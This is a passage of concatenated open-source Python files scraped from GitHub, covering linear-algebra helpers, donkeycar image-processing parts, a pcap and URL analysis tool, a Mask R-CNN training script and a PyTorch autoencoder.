_f, path = tempfile.mkstemp(suffix, prefix, dir)
os.close(_f)
remove_at_exit(path)
return path
# Register a file to be removed at exit
def remove_at_exit(path):
atexit.register(os.remove, path)
```
#### File: coursera-CodeMatrix/homeworks/read_data.py
```python
from vec import Vec
from mat import Mat
def read_vectors(filename):
"""File should have the following format:
First line should consist of labels, separated by tabs or spaces.
Remaining lines should consist of numeric data.
Procedure returns a list of Vecs, one for each line of numeric data.
The labels for the Vecs are the strings given in the first line.
"""
with open(filename) as file:
labels = file.readline().split()
vlist = [Vec(set(labels), dict(zip(labels, map(float, line.split())))) for line in file]
return vlist
def read_matrix(filename):
"""File should have the following format:
First line should consist of column labels, separated by tabs or spaces.
Each subsequent line should consist of a row label followed by numeric data.
Procedure returns a matrix with the given row and column labels and numeric data
"""
with open(filename) as file:
col_labels = file.readline().split()
row_labels = set()
f = {}
for line in file:
entries = line.split()
row_label = entries[0]
row_labels.add(row_label)
for col, entry in zip(col_labels, entries[1:]):
f[row_label, col] = entry
return Mat((row_labels, set(col_labels)), f)
def read_vector(filename):
"""File should have the following format:
Each line consists of a label followed by a single numeric value, separated by whitespace
Procedure returns a vector with one entry per line of the file
"""
with open(filename) as file:
func = {k: float(v) for k,v in (line.split() for line in file)}
domain = set(func.keys())
return Vec(domain, func)
```
#### File: coursera-CodeMatrix/homeworks/vecutil.py
```python
from vec import Vec
def list2vec(L):
"""Given a list L of field elements, return a Vec with domain {0...len(L)-1}
whose entry i is L[i]
>>> list2vec([10, 20, 30])
Vec({0, 1, 2},{0: 10, 1: 20, 2: 30})
"""
return Vec(set(range(len(L))), {k:L[k] for k in range(len(L))})
def zero_vec(D):
"""Returns a zero vector with the given domain
"""
return Vec(D, {})
```
#### File: JediKoder/coursera-CodeMatrix/triangular.py
```python
from vec import Vec
from vecutil import zero_vec
def triangular_solve_n(rowlist, b):
D = rowlist[0].D
n = len(D)
assert D == set(range(n))
x = zero_vec(D)
for j in reversed(range(n)):
x[j] = (b[j] - rowlist[j] * x)/rowlist[j][j]
return x
def triangular_solve(rowlist, label_list, b):
D = rowlist[0].D
x = zero_vec(D)
for j in reversed(range(len(D))):
c = label_list[j]
row = rowlist[j]
x[c] = (b[j] - x*row)/row[c]
return x
```
|
{
"source": "JediLuke/rufus",
"score": 3
}
|
#### File: donkeycar/parts/cv.py
```python
import cv2
import numpy as np
class BirdsEyePerspectiveTxfrm():
#http://www.coldvision.io/2017/03/02/advanced-lane-finding-using-opencv/
def compute_perspective_transform(self, binary_image):
# Get input image dimensions
shape = binary_image.shape[::-1] # (width,height)
w = shape[0]
h = shape[1]
# print("w: " + str(w) + " h: " + str(h)) # w: 160 h: 120
# We take the input image as a trapezoid (i.e. it has perspective) and project/transform it into a square shape (i.e. flat)
# The 4 points that select quadilateral on the input , from top-left in clockwise order
transform_src = np.float32([ [int(w/5),int(4*h/10)], [int(5*w/6),int(4*h/10)], [w,h], [0,h] ])
#transform_src = np.float32([ [-100,-100], [w+100,-100], [w+100,h+100], [-100,h+100] ])
transform_dst = np.float32([ [0,h], [w,h], [w,h], [0,h] ])
M = cv2.getPerspectiveTransform(transform_src, transform_dst)
return M
def run(self, img_arr):
M = self.compute_perspective_transform(img_arr)
return cv2.warpPerspective(img_arr, M, (img_arr.shape[1], img_arr.shape[0]), flags=cv2.INTER_NEAREST) # keep same size as input image
class AdaptiveThreshold():
def __init__(self, high_threshold=255):
self.high_threshold = high_threshold
def run(self, img_arr):
return cv2.adaptiveThreshold(img_arr, self.high_threshold,
cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 115, 1)
class DrawLine():
def __init__(self, line_start, line_finish):
self.line_start = line_start
self.line_finish = line_finish
def run(self, img_arr):
return cv2.line(img_arr, self.line_start, self.line_finish, (255,0,0), 5)
#Luke's NOTE: Simulator fundamentally doesn't work in a way to support this :(
# class SimulatorLink:
# """
# Wrapper around SteeringServer, which allows us to place the Simulator
# in the Vehicle event loop/pipeline.
# """
# def __init__(self, resolution=(120,160), box_size=4, color=(255, 0, 0)):
# self.sio = socketio.Server()
# self.timer = FPSTimer()
# self.top_speed = float(3)
# #Start websocket server
# self._go(('0.0.0.0', 9090))
# def _go(self, address):
# # wrap Flask application with engineio's middleware
# self.app = socketio.Middleware(self.sio, self.app)
# # deploy as an eventlet WSGI server
# try:
# eventlet.wsgi.server(eventlet.listen(address), self.app)
# except KeyboardInterrupt:
# # unless some hits Ctrl+C and then we get this interrupt
# print('stopping')
# def _connect(self, sid, environ):
# print("connect ", sid)
# self.timer.reset()
# self.send_control(0, 0)
# def _throttle_control(self, last_steering, last_throttle, speed, nn_throttle):
# '''
# super basic throttle control, derive from this Server and override as needed
# '''
# if speed < self.top_speed:
# return 0.3
# return 0.0
# def _telemetry(self, sid, data):
# '''
# Callback when we get new data from Unity simulator.
# We use it to process the image, do a forward inference,
# then send controls back to client.
# Takes sid (?) and data, a dictionary of json elements.
# '''
# if data:
# # The current steering angle of the car
# last_steering = float(data["steering_angle"])
# # The current throttle of the car
# last_throttle = float(data["throttle"])
# # The current speed of the car
# speed = float(data["speed"])
# # The current image from the center camera of the car
# imgString = data["image"]
# # decode string based data into bytes, then to Image
# image = Image.open(BytesIO(base64.b64decode(imgString)))
# # then as numpy array
# image_array = np.asarray(image)
# # optional change to pre-preocess image before NN sees it
# if self.image_part is not None:
# image_array = self.image_part.run(image_array)
# # forward pass - inference
# steering, throttle = self.kpart.run(image_array)
# # filter throttle here, as our NN doesn't always do a greate job
# throttle = self._throttle_control(last_steering, last_throttle, speed, throttle)
# # simulator will scale our steering based on it's angle based input.
# # but we have an opportunity for more adjustment here.
# steering *= self.steering_scale
# # send command back to Unity simulator
# self.send_control(steering, throttle)
# else:
# # NOTE: DON'T EDIT THIS.
# self.sio.emit('manual', data={}, skip_sid=True)
# self.timer.on_frame()
# def _send_control(self, steering_angle, throttle):
# self.sio.emit(
# "steer",
# data={
# 'steering_angle': steering_angle.__str__(),
# 'throttle': throttle.__str__()
# },
# skip_sid=True)
# def update(self):
# sio = self.sio
# @sio.on('telemetry')
# self._telemetry(sid, data)
# # def telemetry(sid, data):
# # self.telemetry(sid, data)
# @sio.on('connect')
# self._connect(sid, environ)
# # def connect(sid, environ):
# # self.connect(sid, environ)
# def run_threaded(self):
# return self.data
### Below are official DOnkeycar cv functions
class ImgGreyscale():
def run(self, img_arr):
img_arr = cv2.cvtColor(img_arr, cv2.COLOR_RGB2GRAY)
return img_arr
class ImgCanny():
def __init__(self, low_threshold=60, high_threshold=110):
self.low_threshold = low_threshold
self.high_threshold = high_threshold
def run(self, img_arr):
return cv2.Canny(img_arr,
self.low_threshold,
self.high_threshold)
class ImgGaussianBlur():
def __init__(self, kernal_size=5):
self.kernal_size = kernal_size
def run(self, img_arr):
return cv2.GaussianBlur(img_arr,
(self.kernel_size, self.kernel_size), 0)
class ImgCrop:
"""
Crop an image to an area of interest.
"""
def __init__(self, top=0, bottom=0, left=0, right=0):
self.top = top
self.bottom = bottom
self.left = left
self.right = right
def run(self, img_arr):
width, height, _ = img_arr.shape
img_arr = img_arr[self.top:height-self.bottom,
self.left: width-self.right]
return img_arr
class ImgStack:
"""
Stack N previous images into a single N channel image, after converting each to grayscale.
The most recent image is the last channel, and pushes previous images towards the front.
"""
def __init__(self, num_channels=3):
self.img_arr = None
self.num_channels = num_channels
def rgb2gray(self, rgb):
'''
take a numpy rgb image return a new single channel image converted to greyscale
'''
return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])
def run(self, img_arr):
width, height, _ = img_arr.shape
gray = self.rgb2gray(img_arr)
if self.img_arr is None:
self.img_arr = np.zeros([width, height, self.num_channels], dtype=np.dtype('B'))
for ch in range(self.num_channels - 1):
self.img_arr[...,ch] = self.img_arr[...,ch+1]
self.img_arr[...,self.num_channels - 1:] = np.reshape(gray, (width, height, 1))
return self.img_arr
class Pipeline():
def __init__(self, steps):
self.steps = steps
def run(self, val):
for step in self.steps:
f = step['f']
args = step['args']
kwargs = step['kwargs']
val = f(val, *args, **kwargs)
return val
```
#### File: donkeycar/parts/lidar.py
```python
import time
import numpy as np
class Ultrasonic():
def __init__(self):
# self.sensor = someThing()
self.dist = 1000
def run_threaded(self):
return self.dist
def update(self):
#self.dist = self.sensor.getReading()
print("uSonic dist " + str(self.dist))
self.dist = self.dist - 10
class RPLidar():
def __init__(self, port='/dev/ttyUSB0'):
from rplidar import RPLidar
self.port = port
self.frame = np.zeros(shape=365)
self.lidar = RPLidar(self.port)
self.lidar.clear_input()
time.sleep(1)
self.on = True
def update(self):
self.measurements = self.lidar.iter_measurments(500)
for new_scan, quality, angle, distance in self.measurements:
angle = int(angle)
self.frame[angle] = 2*distance/3 + self.frame[angle]/3
if not self.on:
break
def run_threaded(self):
return self.frame
```
|
{
"source": "Jedimaster4559/CS499-DartBoard",
"score": 3
}
|
#### File: dartboard/backend/models.py
```python
import uuid
from django.db import models
##
# This is a basic model class designed to show backend proof of concept
class DartboardHit(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
x = models.IntegerField(default=0)
y = models.IntegerField(default=0)
def __str__(self):
return str(self.x) + ', ' + str(self.y)
```
|
{
"source": "jedimasterbot/ipf-analyzer",
"score": 3
}
|
#### File: ipf-analyzer/sources/pcapgraph.py
```python
import json
from collections import Counter
from scapy.layers.inet import IP
from datetime import datetime
import pandas as pd
import plotly
import plotly.graph_objs as go
from scapy.layers import http
def CountTable(all_ip, public_ip):
tableIp, tablePubIp = {}, {}
cnt = Counter()
for ip in all_ip:
cnt[ip] += 1
for key, value in cnt.most_common():
if key in public_ip:
tablePubIp[key] = value
tableIp[key] = value
else:
tableIp[key] = value
return tableIp, tablePubIp
def BytesOverTime(packets):
pktBytes = []
pktTimes = []
for pkt in packets:
if IP in pkt:
try:
pktBytes.append(pkt[IP].len)
pktTime = datetime.fromtimestamp(pkt.time)
pktTimes.append(pktTime.strftime('%Y-%m-%d %H:%M:%S.%f'))
except:
pass
dataByte = pd.Series(pktBytes).astype(int)
times = pd.to_datetime(pd.Series(pktTimes).astype(str), errors='coerce')
df = pd.DataFrame({'Bytes': dataByte, 'Time': times})
df = df.set_index('Time')
df2 = df.resample('2S').sum()
trace = [go.Scatter(x=df2.index, y=df2['Bytes'])]
graphJSON = json.dumps(trace, cls=plotly.utils.PlotlyJSONEncoder)
return graphJSON
def SniffUrls(packets):
urls = []
for packet in packets:
if packet.haslayer(http.HTTPRequest):
http_layer = packet.getlayer(http.HTTPRequest)
ip_layer = packet.getlayer(IP)
src, method = ip_layer.fields.get('src'), http_layer.fields.get('Method')
host, path = (http_layer.fields.get('Host')), (http_layer.fields.get('Path'))
method = method.decode('utf-8')
url = (host.decode('utf-8') + path.decode('utf-8'))
urls.append([src, method, f'http://{url}'])
return {'urls': urls}
```
#### File: ipf-analyzer/sources/urlscan.py
```python
import copy
import requests
from common.config import empty
def UrlScanReporter(values, analysis=True):
urlscan_val = []
for usrInput in values:
urlScanFramework = copy.deepcopy(empty)
params = (('q', 'domain:%s' % usrInput),)
response = requests.get('https://urlscan.io/api/v1/search/', params=params)
r = response.json()
if r.get('status'):
pass
elif len(r.get('results')) == 0:
pass
else:
data = (r.get('results')[0])
if analysis:
urlScanFramework.update({'Action On': usrInput})
urlScanFramework.update({'Link': data.get('result')})
urlScanFramework.update({'Screenshot URL': data.get('screenshot')})
urlScanFramework.update({'Indexed At': data.get('indexedAt')})
urlScanFramework.update({'Task Submitted': data.get('task').get('method')})
urlScanFramework.update({'Visibility': data.get('task').get('visibility')})
urlscan_val.append({'URLScan': urlScanFramework})
else:
urlScanFramework.update({'UrlScanLink': data.get('result')})
res = requests.get(data.get('result'))
if res.status_code != 200:
urlScanFramework.update({'UrlScanScore': 'None'})
urlscan_val.append({str(usrInput): urlScanFramework})
else:
scanData = res.json()
urlScanFramework.update({'UrlScanScore': str(scanData.get('verdicts').get('overall').get('score'))})
urlscan_val.append({str(usrInput): urlScanFramework})
return urlscan_val
```
|
{
"source": "jedimatt42/fcmd",
"score": 3
}
|
#### File: jedimatt42/fcmd/makeapi.py
```python
import sys
import re
def get_api_names():
aliases = { }
# return the map of function names included in the api => client alias
with open(sys.argv[1], 'r') as api_lst:
for line in [ n.strip() for n in api_lst.readlines() if len(n) > 1 ]:
parts = line.split(' ')
if len(parts) > 1:
aliases[parts[0]] = parts[1]
else:
aliases[parts[0]] = parts[0]
return aliases
def get_api_banks():
# return a map of function name => bank switch address
bank_map = { }
pat = re.compile(r"DECLARE_BANKED(_VOID)?\((\w+), BANK\((\d+)\)")
with open(sys.argv[3], 'r') as api_banks:
for line in api_banks.readlines():
# b8_terminal.h:DECLARE_BANKED_VOID(tputc, BANK(8), bk_tputc, (int c), (c))
m = pat.search(line)
if m:
bank_map[m.group(2)] = (int(m.group(3)) << 1) + 0x6000
return bank_map
def get_api_decls():
# return map of function name => DECLARE_BANKED statements
sig_map = { }
pat = re.compile(r"DECLARE_BANKED_VOID?\((\w+),\s*BANK\(\d+\),\s*\w+,\s*(\([^\)]*\)),\s*(\([^\)]*\))\)")
# group 1 : function name
# group 2 : argument signatures
# group 3 : argument names
retpat = re.compile(r"DECLARE_BANKED?\((\w+),\s*BANK\(\d+\),\s*([^,]+),\s*\w+,\s*(\([^\)]*\)),\s*(\([^\)]*\))\)")
# group 1 : function name
# group 2 : return type
# group 3 : argument signatures
# group 4 : argument names
with open(sys.argv[3], 'r') as api_banks:
for line in api_banks.readlines():
m = pat.search(line)
if m:
sig_map[m.group(1)] = ('void', m.group(2), m.group(3))
else:
m = retpat.search(line)
if m:
sig_map[m.group(1)] = (m.group(2), m.group(3), m.group(4))
return sig_map
# Load all the names from api.lst
aliases = get_api_names()
names = aliases.keys()
# build a map of the function name to bank address
banks = get_api_banks()
# Compose and write the api function lookup table assembly file
with open(sys.argv[2], 'w') as api_asm:
api_asm.write(f"\tref\tfc_api\n")
for name in names:
api_asm.write(f"\tref\t{name}\n")
api_asm.write("\n")
api_asm.write(f"\tdata fc_api\n")
for name in names:
api_asm.write(f"\tdata {name},{banks[name]}\n")
# load the signatures
signatures = get_api_decls()
# Create the client gcc include file
with open(sys.argv[4], 'w') as client_api_h:
# copy the 'template' preample
with open('fc_api_template', 'r') as preamble:
for line in preamble.readlines():
client_api_h.write(line)
fn = 0x6082
for name in names:
# For each function define the table address
#
# #define FC_TPUTC 0x6082
def_name = f'fc_{aliases[name]}'.upper()
client_api_h.write(f'#define {def_name} {hex(fn)}\n')
fn += 4
for name in names:
# For each function write something like:
#
# // declare function: void fc_tputc(int value);
# DECL_FC_API_CALL(FC_TPUTC, fc_tputc, void, (int value), (value))
sig = signatures[name]
fc_name = f'fc_{aliases[name]}'
client_api_h.write(f'\n// function: {sig[0]} {fc_name}{sig[1]}\n')
client_api_h.write(f'DECL_FC_API_CALL({fc_name.upper()}, {fc_name}, {sig[0]}, {sig[1]}, {sig[2]})\n')
# end the include file ifndef
client_api_h.write('\n#endif\n')
```
|
{
"source": "jedimatt42/language-formatters-pre-commit-hooks",
"score": 2
}
|
#### File: language-formatters-pre-commit-hooks/tests/__init__.py
```python
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import os
import typing
from contextlib import contextmanager
from posixpath import basename
from shutil import copyfile
import py
F = typing.TypeVar("F", bound=typing.Callable)
@contextmanager
def change_dir_context(directory: str) -> typing.Generator[None, None, None]:
working_directory = os.getcwd()
try:
os.chdir(directory)
yield
finally:
os.chdir(working_directory)
@contextmanager
def undecorate_function(func: F) -> typing.Generator[F, None, None]:
passed_function = func
func = getattr(passed_function, "__wrapped__", passed_function)
yield func
func = passed_function
def __read_file(path: str) -> str:
with open(path) as f:
return "".join(f.readlines())
def run_autofix_test(
tmpdir: py.path.local,
method: typing.Callable[[typing.List[str]], int],
not_pretty_formatted_path: str,
formatted_path: str,
) -> None:
tmpdir.mkdir("src")
not_pretty_formatted_tmp_path = tmpdir.join("src").join(basename(not_pretty_formatted_path)).strpath
copyfile(not_pretty_formatted_path, not_pretty_formatted_tmp_path)
with change_dir_context(tmpdir.strpath):
assert method(["--autofix", not_pretty_formatted_tmp_path]) == 1
# file was formatted (shouldn't trigger linter again)
with change_dir_context(tmpdir.strpath):
assert method(["--autofix", not_pretty_formatted_tmp_path]) == 0
assert __read_file(not_pretty_formatted_tmp_path) == __read_file(formatted_path)
```
|
{
"source": "jedimud/tintin-data",
"score": 3
}
|
#### File: tintin-data/py/item_sac_csv.py
```python
from item_data import ItemData
from item_slot import ItemSlot
from item_align import ItemAlign
from item_class import ItemClass
from item_affect import ItemAffect
from item_tag import ItemTag
import json
import os
import csv
class ItemSacCSV():
def __init__(self):
self.item_data = ItemData()
def write_to_file(self):
data = []
# header
h = 'Name,,Limited,Sac'
data.append(h.split(','))
# data
for item in sorted(list({v['name']: v for v in self.item_data.load_items()}.values()), key=lambda i: i['sac'], reverse=True):
row = []
# name
row.append(item['name'])
row.append('')
# limited
found = False
for tag in item['tags']:
if ItemTag(tag) == ItemTag.LIMITED:
row.append('X')
found = True
break
if not found:
row.append('')
# sac
sac = item['sac']
row.append(sac)
row.append('')
# cr
if sac > 0:
data.append(row)
with open('data/item-sac.csv', mode='w') as f:
writer = csv.writer(
f, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
for row in data:
writer.writerow(row)
if __name__ == '__main__':
ItemSacCSV().write_to_file()
```
#### File: tintin-data/py/item_type.py
```python
from enum import Enum, unique
@unique
class ItemType(Enum):
AIRSHIP = "AIRSHIP", "airship"
ARMOR = "ARMOR", "armor"
BOAT = "BOAT", "boat"
CONTAINER = "CONTAINER", "container"
FOOD = "FOOD", "food"
LIQ_CONTAINER = "LIQ-CONTAINER", "liq-container"
OTHER = "OTHER", "other"
POTION = "POTION", "potion"
SCROLL = "SCROLL", "scroll"
STAFF = "STAFF", "staff"
WAND = "WAND", "wand"
WORN = "WORN", "worn"
LIGHT = "LIGHT", "light"
WEAPON = "WEAPON", "weapon"
KEY = "KEY", "key"
FIRE_WEAPON = "FIRE-WEAPON", "fire-weapon"
TREASURE = "TREASURE", "treasure"
MISSILE = "MISSILE", "missile"
TRASH = "TRASH", "trash"
NOTE = "NOTE", "note"
UNDEFINED = "UNDEFINED", "undefined"
PEN = "PEN", "pen"
def __new__(cls, *args, **kwds):
obj = object.__new__(cls)
obj._value_ = args[0]
return obj
def __init__(self, _: str, brief: str = None):
self._brief_ = brief
def __str__(self):
return self.value
@property
def brief(self):
return self._brief_
```
|
{
"source": "jediofgever/Mask_RCNN",
"score": 2
}
|
#### File: Mask_RCNN/motor_part/maskrcnn_train.py
```python
import os
import sys
import json
import datetime
import numpy as np
import skimage.draw
import cv2
from skimage import img_as_ubyte
from skimage.draw import rectangle
from skimage.color import rgb2xyz
import random
# Root directory of the project
ROOT_DIR = os.path.abspath("../")
print(ROOT_DIR)
# Import Mask RCNN
sys.path.append(ROOT_DIR) # To find local version of the library
from mrcnn.config import Config
from mrcnn import model as modellib, utils
# Path to trained weights file
COCO_WEIGHTS_PATH = ROOT_DIR + "/logs/real_data_30_epoch.h5"
TRAIN_JSON_FILE = "/home/royle/catkin_ws/ws_py3_nn/src/CNN_DETS_PICKPLACE/Mask_RCNN/data/labels.json"
TRANSFER_WEIGHTS ="coco"
DATASET_DIR = "/home/royle/catkin_ws/ws_py3_nn/src/CNN_DETS_PICKPLACE/Mask_RCNN/data/"
# Directory to save logs and model checkpoints, if not provided
# through the command line argument --logs
DEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, "logs")
############################################################
# Configurations
############################################################
class MotorPartConfig(Config):
"""Configuration for training on the toy dataset.
Derives from the base Config class and overrides some values.
"""
GPU_COUNT = 1
# Give the configuration a recognizable name
NAME = "motor_part"
# We use a GPU with 12GB memory, which can fit two images.
# Adjust down if you use a smaller GPU.
IMAGES_PER_GPU = 2
# Number of classes (including background)
NUM_CLASSES = 1 + 1 # Background + balloon
# Number of training steps per epoch
STEPS_PER_EPOCH = 100
# Skip detections with < 90% confidence
DETECTION_MIN_CONFIDENCE = 0.9
IMAGE_RESIZE_MODE = "square"
BATCH_SIZE = 1
############################################################
# Dataset
############################################################
class MotorPartDataset(utils.Dataset):
def load_motor_part(self, dataset_dir):
"""Load a subset of the Balloon dataset.
dataset_dir: Root directory of the dataset.
subset: Subset to load: train or val
"""
# Add classes. We have only one class to add.
self.add_class("motor_part", 1, "motor_part")
# Load annotations
# VGG Image Annotator (up to version 1.6) saves each image in the form:
# { 'filename': '28503151_5b5b7ec140_b.jpg',
# 'regions': {
# '0': {
# 'region_attributes': {},
# 'shape_attributes': {
# 'all_points_x': [...],
# 'all_points_y': [...],
# 'name': 'polygon'}},
# ... more regions ...
# },
# 'size': 100202
# }
# We mostly care about the x and y coordinates of each region
# Note: In VIA 2.0, regions was changed from a dict to a list.
with open(TRAIN_JSON_FILE, 'r') as myfile:
data=myfile.read()
# parse file
annotations = json.loads(data)
# The VIA tool saves images in the JSON even if they don't have any
# annotations. Skip unannotated images.
#annotations = [a for a in annotations if a['regions']]
via_1_check = annotations.get('regions')
via_2_check = annotations.get('_via_img_metadata')
# JSON is formatted with VIA-1.x
if via_1_check:
annotations = list(annotations.values())
# JSON is formatted with VIA-2.x
elif via_2_check:
annotations = list(annotations['_via_img_metadata'].values())
# Unknown JSON formatting
else:
raise ValueError('The JSON provided is not in a recognised via-1.x or via-2.x format.')
#annotations = [a for a in annotations if a['regions']]
# Add images
for a in annotations:
# Get the x, y coordinaets of points of the polygons that make up
# the outline of each object instance. These are stores in the
# shape_attributes (see json format above)
# The if condition is needed to support VIA versions 1.x and 2.x.
if type(a['regions']) is dict:
polygons = [r['shape_attributes'] for r in a['regions'].values()]
else:
polygons = [r['shape_attributes'] for r in a['regions']]
# load_mask() needs the image size to convert polygons to masks.
# Unfortunately, VIA doesn't include it in JSON, so we must read
# the image. This is only managable since the dataset is tiny.
image_path = os.path.join(dataset_dir, a['filename'])
image = skimage.io.imread(image_path)
height, width = image.shape[:2]
self.add_image(
"motor_part",
image_id=a['filename'], # use file name as a unique image id
path=image_path,
width=width, height=height,
polygons=polygons)
def load_mask(self, image_id):
"""Generate instance masks for an image.
Returns:
masks: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance masks.
"""
# If not a balloon dataset image, delegate to parent class.
image_info = self.image_info[image_id]
if image_info["source"] != "motor_part":
return super(self.__class__, self).load_mask(image_id)
# Convert polygons to a bitmap mask of shape
# [height, width, instance_count]
info = self.image_info[image_id]
mask = np.zeros([info["height"], info["width"], len(info["polygons"])],
dtype=np.uint8)
for i, p in enumerate(info["polygons"]):
# Get indexes of pixels inside the polygon and set them to 1
rr, cc = skimage.draw.polygon(p['all_points_y'], p['all_points_x'])
mask[rr, cc, i] = 1
# Return mask, and array of class IDs of each instance. Since we have
# one class ID only, we return an array of 1s
return mask.astype(np.bool), np.ones([mask.shape[-1]], dtype=np.int32)
def image_reference(self, image_id):
"""Return the path of the image."""
info = self.image_info[image_id]
if info["source"] == "motor_part":
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
def train(model):
"""Train the model."""
# Training dataset.
dataset_train = MotorPartDataset()
dataset_train.load_motor_part(DATASET_DIR)
dataset_train.prepare()
# Validation dataset
dataset_val = MotorPartDataset()
dataset_val.load_motor_part(DATASET_DIR)
dataset_val.prepare()
# *** This training schedule is an example. Update to your needs ***
# Since we're using a very small dataset, and starting from
# COCO trained weights, we don't need to train too long. Also,
# no need to train all layers, just the heads should do it.
print("Training network heads")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE,
epochs=1,
layers='heads')
############################################################
# Training
############################################################
if __name__ == '__main__':
import argparse
config = MotorPartConfig()
config.display()
model = modellib.MaskRCNN(mode="training", config=config,
model_dir=DEFAULT_LOGS_DIR)
# Select weights file to load
if TRANSFER_WEIGHTS == "coco":
weights_path = COCO_WEIGHTS_PATH
# Download weights file
if not os.path.exists(weights_path):
utils.download_trained_weights(weights_path)
elif TRANSFER_WEIGHTS == "last":
# Find last trained weights
weights_path = model.find_last()
elif TRANSFER_WEIGHTS == "imagenet":
# Start from ImageNet trained weights
weights_path = model.get_imagenet_weights()
# Load weights
print("Loading weights ", weights_path)
model.load_weights(weights_path, by_name=True, exclude=[ "mrcnn_class_logits", "mrcnn_bbox_fc", "mrcnn_bbox", "mrcnn_mask"])
train(model)
```
|
{
"source": "jediofgever/quadruped_ros2",
"score": 2
}
|
#### File: champ_bringup/launch/rviz.launch.py
```python
import os
from ament_index_python.packages import get_package_share_directory
from launch import LaunchDescription
from launch.actions import DeclareLaunchArgument
from launch.conditions import UnlessCondition
from launch.substitutions import LaunchConfiguration
from launch_ros.actions import Node
def generate_launch_description():
bringup_dir = get_package_share_directory('thorvald_bringup')
rviz_config_file = LaunchConfiguration('rviz_config')
declare_rviz_config_file_cmd = DeclareLaunchArgument(
'rviz_config',
default_value=os.path.join(bringup_dir, 'rviz',
'default_view.rviz'),
description='Full path to the RVIZ config file to use')
rviz_node = Node(
package='rviz2',
executable='rviz2',
name='rviz2',
# change it to screen if you wanna see RVIZ output in terminal
output={'both': 'log'},
arguments=['-d', rviz_config_file,
'--ros-args', '--log-level', 'ERROR']
)
return LaunchDescription([
declare_rviz_config_file_cmd,
rviz_node
])
```
|
{
"source": "jedi-padawan/autoencoders",
"score": 3
}
|
#### File: jedi-padawan/autoencoders/convolutional-autoencoder-small.py
```python
import matplotlib.pyplot as plt # plotting library
import numpy as np # this module is useful to work with numerical arrays
import pandas as pd
import random
import torch
import torchvision
from torchvision import datasets, transforms
from torch.utils.data import DataLoader,random_split
from torch import nn
import torch.nn.functional as F
import torch.optim as optim
#data_dir = 'dataset'
#train_dataset = torchvision.datasets.MNIST(data_dir, train=True, download=True)
#test_dataset = torchvision.datasets.MNIST(data_dir, train=False, download=True)
fsize = 228
batch_size = 256
train_transform = transforms.Compose([
transforms.RandAugment(12, 5, 31),
transforms.Resize(fsize),
transforms.ToTensor(),
])
test_transform = transforms.Compose([
transforms.Resize(fsize),
transforms.ToTensor(),
])
data_path = '/pool/data/ISSM2020/issm2020-ai-challenge-normal-only/'
train_dataset = datasets.ImageFolder(data_path + "semTrain/" + "semTrain/", train_transform)
test_dataset = datasets.ImageFolder(data_path + "semTest/" + "semTest/", test_transform)
train_dataset.transform = train_transform
test_dataset.transform = test_transform
m=len(train_dataset)
train_data, valid_data = random_split(train_dataset, [int(m-m*0.2), int(m*0.2)])
batch_size=32
train_loader = torch.utils.data.DataLoader(train_data,
batch_size=batch_size,
shuffle=True, num_workers=5, pin_memory=True, drop_last=True)
valid_loader = torch.utils.data.DataLoader(valid_data,
batch_size=batch_size,
shuffle=True, num_workers=5, pin_memory=True, drop_last=True)
test_loader = torch.utils.data.DataLoader(test_dataset,
batch_size=1,
shuffle=True, num_workers=5, pin_memory=True, drop_last=True)
class Encoder(nn.Module):
def __init__(self, encoded_space_dim,fc2_input_dim):
super().__init__()
### Convolutional section
self.encoder_cnn = nn.Sequential(
nn.Conv2d(1, 8, 3, stride=2, padding=1),
nn.ReLU(True),
nn.Conv2d(8, 16, 3, stride=2, padding=1),
nn.BatchNorm2d(16),
nn.ReLU(True),
nn.Conv2d(16, 32, 3, stride=2, padding=0),
nn.ReLU(True)
)
### Flatten layer
self.flatten = nn.Flatten(start_dim=1)
### Linear section
self.encoder_lin = nn.Sequential(
nn.Linear(3 * 3 * 32, 128),
nn.ReLU(True),
nn.Linear(128, encoded_space_dim)
)
def forward(self, x):
x = self.encoder_cnn(x)
x = self.flatten(x)
x = self.encoder_lin(x)
return x
class Decoder(nn.Module):
def __init__(self, encoded_space_dim,fc2_input_dim):
super().__init__()
self.decoder_lin = nn.Sequential(
nn.Linear(encoded_space_dim, 128),
nn.ReLU(True),
nn.Linear(128, 3 * 3 * 32),
nn.ReLU(True)
)
self.unflatten = nn.Unflatten(dim=1,
unflattened_size=(32, 3, 3))
self.decoder_conv = nn.Sequential(
nn.ConvTranspose2d(32, 16, 3,
stride=2, output_padding=0),
nn.BatchNorm2d(16),
nn.ReLU(True),
nn.ConvTranspose2d(16, 8, 3, stride=2,
padding=1, output_padding=1),
nn.BatchNorm2d(8),
nn.ReLU(True),
nn.ConvTranspose2d(8, 1, 3, stride=2,
padding=1, output_padding=1)
)
def forward(self, x):
x = self.decoder_lin(x)
x = self.unflatten(x)
x = self.decoder_conv(x)
x = torch.sigmoid(x)
return x
### Define the loss function
loss_fn = torch.nn.MSELoss()
### Define an optimizer (both for the encoder and the decoder!)
lr= 0.001
### Set the random seed for reproducible results
torch.manual_seed(0)
### Initialize the two networks
d = 4
#model = Autoencoder(encoded_space_dim=encoded_space_dim)
encoder = Encoder(encoded_space_dim=d,fc2_input_dim=128)
decoder = Decoder(encoded_space_dim=d,fc2_input_dim=128)
params_to_optimize = [
{'params': encoder.parameters()},
{'params': decoder.parameters()}
]
optim = torch.optim.Adam(params_to_optimize, lr=lr, weight_decay=1e-05)
# Check if the GPU is available
device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
print(f'Selected device: {device}')
# Move both the encoder and the decoder to the selected device
encoder.to(device)
decoder.to(device)
### Training function
def train_epoch(encoder, decoder, device, dataloader, loss_fn, optimizer):
# Set train mode for both the encoder and the decoder
encoder.train()
decoder.train()
train_loss = []
# Iterate the dataloader (we do not need the label values, this is unsupervised learning)
for image_batch, _ in dataloader: # with "_" we just ignore the labels (the second element of the dataloader tuple)
# Move tensor to the proper device
image_batch = image_batch.to(device)
# Encode data
encoded_data = encoder(image_batch)
# Decode data
decoded_data = decoder(encoded_data)
# Evaluate loss
loss = loss_fn(decoded_data, image_batch)
# Backward pass
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Print batch loss
